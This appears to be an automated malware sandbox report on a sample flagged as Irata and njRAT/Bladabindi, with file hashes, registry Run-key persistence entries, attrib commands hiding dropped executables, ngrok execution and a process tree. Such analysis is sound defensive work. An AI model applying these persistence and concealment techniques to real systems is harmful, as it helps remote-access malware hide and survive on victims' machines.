| SHA512 | 9bb81b56b85e5af6e75dc513ae3c0d98ef91114efb370da5b132b687de38f2d78a3c799b5f5179e8179c2ef147ac41e11f98449bd79e4c22ce9ec5e49dca294c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000079
| MD5 | fad9cec0fde2833ed2800632c86d7f9a |
| SHA1 | b96a38eb56cea124184d19679724d33387feb6e1 |
| SHA256 | 5e7a1a0b57cd0287dee788d8a3dcbc586d3bc978c51cc97c160541b4c3397084 |
| SHA512 | dc5605c9054e87c21e390dabc95fa5f98ad4550c1ef4e6bbf45131ef5ff49b1ac9f777ed41c473fade4b8d2667a3955e4d10ad1075991dd2c6613199669d7d77 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00007a
| MD5 | 470ab5fb0fd1493903a002130ca991ff |
| SHA1 | 72326a97af9ecb08399283c2757a59e448b392eb |
| SHA256 | ca1254b42cb9991149006e8b366ef751722d2fb482ae7c9a5b7c6d4242e95376 |
| SHA512 | 93347719d3a7d015968a83e98f2d25d556382acb58862578798ee62c3d48aa42828a82708d8d0b7afcd014db8fa464c9c52822eb50b0b946aa96b8c367a95f3f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | dfa3add56060e68d37d7ac1b1034b1bb |
| SHA1 | 376212d0751b83dd1051518667f91255ce179597 |
| SHA256 | bddb689e2047f155b6f22d0f8249a1f27fafd1941a0f5fc419166b7c3fd2c54a |
| SHA512 | b1c3a644d9e73346d8ce01392402a30b7d9b05b4f63ff69628e25723c61a6d8d9df416bdebfe4f53f2301e299a04e6c119a561c4744e0ce47046633c301c824c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9de13ec52851c191b74f2400844a8064 |
| SHA1 | 740289143857279e1b0eeb894fbd40b5102bf888 |
| SHA256 | aa83348bd980ffa037deca2344ea197e5cecb571111c5bfde84867008c202fbe |
| SHA512 | b8ad546deeb5bebc5b23fcb7ff8efd82b4582798ad72c88f767059388d7c07b1e306d281e8dfb1ab933e54621d47e736538722f726351039f0b433fb0ebd463b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\15478963-d02d-42f7-85eb-3143ef478b95.tmp
| MD5 | ee78945055ee98a8eaec0fe9cc7fd2c3 |
| SHA1 | 8c9ea96a4cdf9fd6eb6a72a22501702489672239 |
| SHA256 | b9137ef69da902ef245be27fa7ef1f02ae52c8bc0171372dbabd2959d05e431b |
| SHA512 | 2544057c88a266f7b87238bbad8ce3dc29865b24ac3af81cf60e4e869becf0456d1d36ce62d2ffb2803155439499dcc1653e0a01abeb71b9e77b2b3e6b065fb6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 5d95dc6e0aeb500ab0edecfcf5fdbf39 |
| SHA1 | 584593f90f98e156fcdf0f0684818925e851261f |
| SHA256 | 07722e22efc2d6826dd333357a6b5fe7cb4f9df1ab2ff06152e4b58a80389a42 |
| SHA512 | 1802f929921ee3372a004a745afacfe210edf6f417f81299d530d43bed1a3c6d872ea87d1f92287ee8b575599725d03ff13a5a286da5701f57b7e547b8d18641 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8ab31ec6c7d16cfa0db853a62561be73 |
| SHA1 | a684a639e4ae993a51fbc329af91eadfd2cbe828 |
| SHA256 | 75d9b24731f10ea58f2013ccbc65fbb368c246c8e23177c47c99835ecb498c61 |
| SHA512 | d0634fb023a8f452d6118562e9fc54be7c963d4bdb7a41d042e14e8adb17d713501147ac5f2ca4b30633dd081a1bf26f9ff2c248b92ea43d324046191a915fc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f2a142dc4854ce1efdea0e748aadc5ca |
| SHA1 | 687961a393c1abb1ae1c19e1d0e6d2d9aa1a71a3 |
| SHA256 | d5c7b00b92c690f6632f855dd94395182149538d2e0e91b7f611b67a371048ac |
| SHA512 | 460b5825da724a0825348bc93d9fcf427cb901cf0f1a451da313b7312583ca92550eee8e554f19cf41003a434aa448e08f325944ab44162564c4664fda1613da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 95d91848e1731cc2f30331d2a9903630 |
| SHA1 | 0740c06b0b91c1211a83be9d6fa7002dce3a1e47 |
| SHA256 | 93122d30ecbe734e6e26a7393dc5a1903e68ce30bdfa8c6759a2304c48f4011b |
| SHA512 | 0473cc66d9122258585c43fb91a0f7b004084944b158f28e464cc934ca71c708bc47fafe44c5079d97c66d99a26cbd1c5dd6c40d6b92b95a7b640f229ecebd77 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 758b2d30c3859724f91efcd834e5d3ca |
| SHA1 | b353646f8cd6d2e3fb10f29f4c3805169c44309a |
| SHA256 | 1094938c135ae618137c5d64022226fae85a20cc75b50f097268ccb8c886845f |
| SHA512 | a7675c5e06d3498d7914de222e7c42a75ed2e8d46eeb94bc77561844f6194753e1c2dcb766e714608ddf22072b7b77da8b9a21c66904082fe9d74764c46e9a84 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9634f6c915374c4bc456af2ed61d0a56 |
| SHA1 | fe78f4b75617dcb813ecc42eebcc6ee2f79d3799 |
| SHA256 | 565945317e1d1534a93ba71ad6727727742fe0b8ca23e93f13128904d76d748f |
| SHA512 | 5e4da8ccb4079f74cdcce901d4603eece3de8c06c5f564b91e1dcde83fbc01d6f47184494c5f3e0bf4cfce9fb6c3c101225271749381e6fba3891f78d6472f51 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\bfd702d6-2dfb-4e67-bede-ac8f34c14d8d.tmp
| MD5 | 1de056e6bfb5ede30a54c23816eb539a |
| SHA1 | ffaa06e780eb75fdb2ef42e3a1472debeeddf10d |
| SHA256 | 7a4dc65bd18f47d9b591f99a918a1d5f5658540ed60801f86395afe523ceedf1 |
| SHA512 | e37204e109d1a5b25174c50c31b76c47e23f6be8ac030e9d7c27ffd04fc3b8776630a8e447aa74d1887a985abff74720573ca73b4aaf10bf26567db241430aef |
memory/2600-6265-0x00000000063E0000-0x00000000064E0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f81bab1899c7fc81eb08ba5a9c6a79e1 |
| SHA1 | 6212c067332116847a8e006c561ef655eac72b51 |
| SHA256 | ae75abf4f88752aa0f5a52656a29b52662ccd1bcf0206581b536cd66cf3030c7 |
| SHA512 | b02233e9163d692664691ac6c25bf64784d95ab3e6d883d822bc33ed559314ea3923a8ade31bf4c7fd517e2e0a53847500924fdc64b036d7c18650b6ddd66ca3 |
memory/2600-6275-0x00000000063E0000-0x00000000064E0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a76e735e3cbeb2126427ff44335ad00c |
| SHA1 | 4e90c9d10c9cd857721985be994df08eacdf8ce0 |
| SHA256 | e576aad1c0de9922c065a073c028685204ed971baf21d235f59e29c4a7dd925a |
| SHA512 | 0d31927dd90170f65368f94ad23c7bae6e74a1b12e66bcc0e96a8512d939d658a6148b5abaaec6965f6f2a86e16f177d170be4a2701f2b76a6aa646b9d82a958 |
memory/2600-6294-0x0000000005450000-0x000000000545C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | cac2a7628bf64469136b0a0b3d18138b |
| SHA1 | dba1c9c43ef8561dc85ab0a5fca36f776ab9a237 |
| SHA256 | 8b2264610bec0e22941c8ef9512273ea6d799b2356ef0aa54e04e343f2885e1f |
| SHA512 | 1976567fe4fcecb798138fd04d6905ca0e7fa1c2be3ed4e11e686ca61f52a3dcdf0b7d0014cf8061120b81fc16647793148c9d12effec28e0d10c55b7865ab3b |
C:\Users\Admin\AppData\Local\Temp\zpnkxzuffe.gif
| MD5 | cbb9590c3c824ed7640036059761808b |
| SHA1 | 9067df99ca0300db504eb5ad6c18d9fc74f81bfe |
| SHA256 | d687470aacc68ef7d3960a4fdcadc672a6549ba129b6cd01ec6a06a0b01ea0d1 |
| SHA512 | bd6792bbbe383459cd88a1ec307a1cba0223a9a626c37eabb6f7a922323eab199a16184eb5db064bbcae4db00f0d066076fe296d9e4f5b89571fae536be3c713 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c1096b3616d17c31ac5b13e4dc95e7da |
| SHA1 | f1f52306dd28c7eabeb91b3e2e6ad1fcacdbfb85 |
| SHA256 | c84c37f524ee2e0a11abd13cc73afc59700e32302f7e38ec6e2907f086a803e6 |
| SHA512 | 66c5302fbd35ffcb726ac930f5e5a26701dca0e3cf87bee89f48e5ec2e224e891f38c2c815d7564d9909e95ed9ecedac358d829ad76b07cc053f098a02217350 |
C:\Users\Admin\AppData\Local\Temp\yjwmacodlq.gif
| MD5 | 7a82a73df39e8cd074af61cdf06b6d62 |
| SHA1 | d8d467fedcb72ac4889dbc4c5775a933e74c12b9 |
| SHA256 | 723ccbfc38d7113cb63b136af8d9a70eca14eebeb11bfd878488ae6fcdb59140 |
| SHA512 | ddd6c75e4f720960626005e0521adf677fe885f6c78faaa96aa870791c50ba6f8bb86aac358cb1177f02da22bcfc0895f0e4162aed26860d9d5454463af45ec0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 237577c059169b46d1032e4524471bee |
| SHA1 | 895fad3c513d3a9379298c976c77153398be7990 |
| SHA256 | 65cdc7d3c5115940f98752d5f8fcb67a981a35b4cd3ca92fdc52bddd4180f3db |
| SHA512 | 8b182670c8c5ecb64cb0a4daecc7bac763124cf07f48afecabcac8260ee89277b9016cdc8157a888fa2c67ca2bf2d53f76265d52f7124388adebfc9d99bffe75 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 20:08
Reported
2023-12-18 20:39
Platform
win10v2004-20231215-en
Max time kernel
1802s
Max time network
1799s
Command Line
Signatures
Irata
Irata payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
njRAT/Bladabindi
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_WSlAND = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_WSlAND.vbs" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Net amp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\System Settings Broker.exe" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-5HEOE.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-K9HJP.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-FEC5Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\ProcessHacker.exe | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\UserNotes.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-UCH0P.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-U8AEP.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\x86\ProcessHacker.exe | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\Updater.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-FDGBI.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\peview.exe | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-MG768.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\x86\is-4FMG8.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-6TTO2.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-GEIAF.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\x86\plugins\is-U2Q8J.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-CFSGE.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-POG13.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2\x86\plugins\DotNetTools.dll | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-0K6PF.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-SUFKA.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-P5MF8.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-CD30M.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-L471S.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-4SRG2.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-EG2AC.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-FK9K5.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\is-BIA04.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-MBAFR.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
| File created | C:\Program Files\Process Hacker 2\plugins\is-B168P.tmp | C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Process Hacker 2\ProcessHacker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Process Hacker 2\ProcessHacker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Creative EAX Settings.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\processhacker-2.39-setup.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\processhacker-2.39-setup(1).exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Process Hacker 2\ProcessHacker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Net amp.exe
"C:\Users\Admin\AppData\Local\Temp\Net amp.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe
"C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.0.1637227468\15622854" -parentBuildID 20221007134813 -prefsHandle 1872 -prefMapHandle 1864 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec097978-0372-4dde-943f-9f702f63ea74} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 1964 1c979bb8b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.1.141293909\2018825467" -parentBuildID 20221007134813 -prefsHandle 2336 -prefMapHandle 2332 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54399ab9-9707-4f5a-84c8-a787278289aa} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 2364 1c96d26f558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.2.2012089274\550300600" -childID 1 -isForBrowser -prefsHandle 3296 -prefMapHandle 3292 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0db47547-0343-4e78-bc02-c3fe5bfb9319} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 3128 1c97dcf3a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.3.319130038\1464540965" -childID 2 -isForBrowser -prefsHandle 3616 -prefMapHandle 3612 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c34f843-6aff-4b93-8a4d-d53042dde3f3} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 2960 1c96d268758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.4.1179311708\86572469" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ee96add-127b-4737-b25b-cc008d14616c} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 4164 1c97eab4058 tab
